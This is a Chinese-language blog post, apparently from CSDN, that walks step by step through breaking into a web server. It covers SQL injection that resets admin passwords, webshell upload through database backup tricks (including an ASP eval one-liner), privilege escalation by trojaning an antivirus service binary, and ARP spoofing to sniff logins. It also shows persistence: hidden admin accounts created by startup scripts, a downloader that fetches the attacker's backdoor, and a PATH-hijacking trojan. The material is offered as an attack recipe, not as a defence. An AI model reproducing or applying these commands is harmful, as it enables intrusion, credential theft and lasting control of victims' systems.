关闭

一些入侵思路

584人阅读 评论(0) 收藏 举报
在百度上搜索ckl inurl:asp,搜索出来的,只要是MSSQL数据库的就一定是db_owner权限以上,起码我还没看到过
public的,db_owner可是对当前连接的数据库拥有一切操作权利,可以执行select,update,delete.create.drop等命令.
在搜索出来的资料,找到一个china级的网站,是db_owner权限,浏览一下网站,发现上面上了一个动网7.1论坛,通过
whois.webhosting.info查询,发现还挂有一个网站,应当是个人主机,通过telnet target 80发现iis5.0的,windows2000的吧!
1,得到webshell
有两个思路.第一个是从网站着手
首先从暴表开始,找了一下发现user这个表示存放的动网的用户表,再暴这个表的字段,顺利找出管理员的用户名和密码,密码是md5加密,到www.xmd5.org是解一下,发现管理员还是有一些安全意识的,不是弱口令.那我们是
db_owner权限,可以update,还害怕什么!直接在注入点www.target.com/list.id=1‘;update [user] set password=’49ba59abbe56e057′ where id=1– 其中49ba59abbe56e057是123456的md5加密,现在就把前台管理员的密码改成123456了,又同样方法把后台管理员的密码也改成123456,顺利登陆.好,现在可以利用备份数据库的方法,得到webshell
大家都知道动网7.1不能象以前的老方法进行备份,得到webshell了,备份时会检查是不是mdb文件,如果不是就会出错!可是我们也有对策,建一个表,在字段里插入try{eval(Request.form(’#’)+’’)}catch(e){}冰狐浪子的小马,然后把表改成1.gif(也可以在利用copy的命令)在前台上传后,记下地址,在后台直接备份成a.asp成功,用冰狐的客户端连接成功,再上传一个比较少见的大马.
第二个是思路
直接进行差异备份,这里用到的方法是 swan 最近刚公布的backup log
alter database XXXX set RECOVERY FULL
backup log XXXX to disk = ‘c:/Sammy’ with init
create table cmd (a image)
insert into cmd (a) values (’’)
backup log XXXX to disk = ‘c:/xxx/2.asp’
其中XXXX 是数据库 的多了一个%,是为了容错
应用此法顺利得到一个webshell
那现在当然是找提升权限的漏洞了,考虑的当然serv-u和pcanywhere,在系统服务列表里看到了pcanywhere的痕迹,在地址栏输入C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 顺利得到一个.cif文件,用pcanywhere passview得到用户名跟密码,用pcanywhere登陆发现要求只能administrators组才能登陆,那好现在的思路就是找个自启动的服务程序,在系统服务列表里找到了一个瑞星,路径D:/PROGRAM FILES/RISING/RAV下载rising.exe下来后,再捆绑了一个加用户的vbs,再把目标的rising.exe改一下名,再把捆绑好的rising.exe上传上去.就等待服务器的重启了.我可是很有耐心的.提权的方法是多种多样的,自己看着办吧

2.外网的安全
最近看了很多篇的ARP欺骗文章,所以就试验一下.首先ping www.target.com得到IP1.1.1.2,通过portready扫描1.1.1.0-1.1.1.255,通过以前很流行的ms05039,顺利得到一个机子1.1.1.3,并开了3389,进去后直接下载winpcap驱动(嗅探器依赖的驱动),再下载一个arpspoof(嗅探器),然后tracert 发现网关是1.1.1.1.我自己讲一下ARP欺骗的原理,ARP就是地址解析协议,是OSI的网络层(IP层)转为数据链路层(MAC)的协议,在LAN中通信并不是以IP作为地址,而是物理地址,也就是MAC.那我们变可以进行邪恶的欺骗行为,比如有3台主机,A.B.C,A是你的机子,B是你想欺骗
的主机,C是网关,那我们可以发送一个ARP应答给C,说我是B,给C我的MAC地址,再欺骗B,我是网关,并给他我的MAC
地址,他们就会误会,并把所有给B的数据都流向给A.应此A的CPU也就会负荷,可能导致死机.
个人认为防护方法,主动的方法是把MAC和IP固态绑定
ARPSPOOF就是这样的工具.命令格式ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
在1.1.1.3上运行arpspoof 1.1.1.1 1.1.12 1.1.1.3 21 c:/log.txt
现在就是等待管理员的登陆了
3.固守肉鸡
辛苦得到了肉鸡当然要好好保护了,我们可以利用文件夹的创建漏洞,比如有一个文件夹A 那么我们在cmd下,转
到当前路径,输入mkdir a../这样就创建了一个文件夹a../,而当打开这个文件的时候却指向A文件夹,那么我们可以防一个ASP木马在里面,再使用netbox指向这个文件,这个ASP木马就是SYSTEM的权限了.当我们访问www.target.com/a..//asp木马 这样就可以了.同样的我们也可以利用IIS5.0的漏洞,创建一个虚绿目录A,在这个虚绿目录中又在创建一个虚绿目录B,并指定文件地址,并把IIS的保护挑低,再把我们的第一个虚绿目录A删掉,这样我们访问的时候,www.target.com/a/b/asp木马.同样也拥有SYSTEM的权限.那我们为了以防万一,可以利用此法
net user jouanc$ 123456 /add
net localgroup administrators jouanc$ /add保存为1.vbs,并放在C:/winnt/system32/GroupPolicy/Machine/Scripts/Startup /该目录

net user jouanc$ /del保存为2.vbs,并放在C:/winnt/system32/GroupPolicy/Machine/Scripts/Shutdown/

将以下保存为script.ini,并放在C:/winnt/system32/GroupPolicy/Machine/Scripts
[Startup]
0CmdLine=1.vbs
0Parameters=
[Shutdown]
0CmdLine=2.vbs
0Parameters=

我还有一个想法,就是建个”从网上下载东东的vbs”相当与downloader,从我们自己的空间下载我们配置好的后门
然后用个bat,利用if来判断是否把我们的后门下载下来,然后再goto运行它,把这两个绑好后,放在startup里.
在shutdown里,放一个del “我们的木马”的bat,前提ie可以打开,我进过一些肉鸡,要打开ie,必须设置的.
还有一招,大家在cmd下输入set
其中有两行
Path=D:/WINNT/system32;D:/WINNT;D:/WINNT/System32/Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
知道吧,.com最有优先权,那我们可以放一个www.google.com,注意”www.google.com”是我们的木马,我们把它放在
D:/WINNT/system32,哈哈,当肉鸡打开ie,输入www.google.com的话,ie只会先找我们的木马
除非他输入的是”http://www.google.com”

其实保护肉鸡的方法有很多,我很喜欢这种保护肉鸡的方法,不会被杀,又能抓牢肉鸡 
  文章里有一些社会工程学的思路,很有意思。虽然有一些算是比较老的技术,但是变动下又可以用。呵呵

提权的时候,放个msn.com木马进去得了

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:104040次
    • 积分:1430
    • 等级:
    • 排名:千里之外
    • 原创:28篇
    • 转载:39篇
    • 译文:0篇
    • 评论:4条
    最新评论